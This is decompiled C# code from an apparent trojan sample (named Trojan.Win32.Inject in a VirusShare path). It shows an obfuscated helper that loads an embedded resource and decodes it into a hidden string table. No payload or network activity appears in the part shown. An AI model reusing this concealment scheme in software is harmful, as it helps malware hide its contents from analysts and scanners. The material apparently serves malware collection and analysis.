// Decompiled with JetBrains decompiler // Type:  // Assembly: Ressource, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 7A61D5AB-B799-4526-BF58-A6DA1297213F // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515.exe using System.Collections; using System.IO; using System.Reflection; internal sealed class \uE00B { public static string \uE000(int _param0) => string.Intern(\uE00B.\uE009.\uE000.\uE000(_param0)); public static string \uE000 => "131626d8a90446728bfdd3abc017c1a2"; private sealed class \uE009 { public static readonly \uE00B.\uE009 \uE000 = new \uE00B.\uE009(); private Hashtable \uE001; private \uE009() { MemoryStream input = \uE00C.\uE000(Assembly.GetExecutingAssembly().GetManifestResourceStream(\uE00B.\uE000)); long length = input.Length; BinaryReader binaryReader = new BinaryReader((Stream) input); this.\uE001 = new Hashtable(); while (input.Position < length) this.\uE001.Add((object) (int) input.Position, (object) binaryReader.ReadString()); } public string \uE000(int _param1) => (string) this.\uE001[(object) _param1]; } }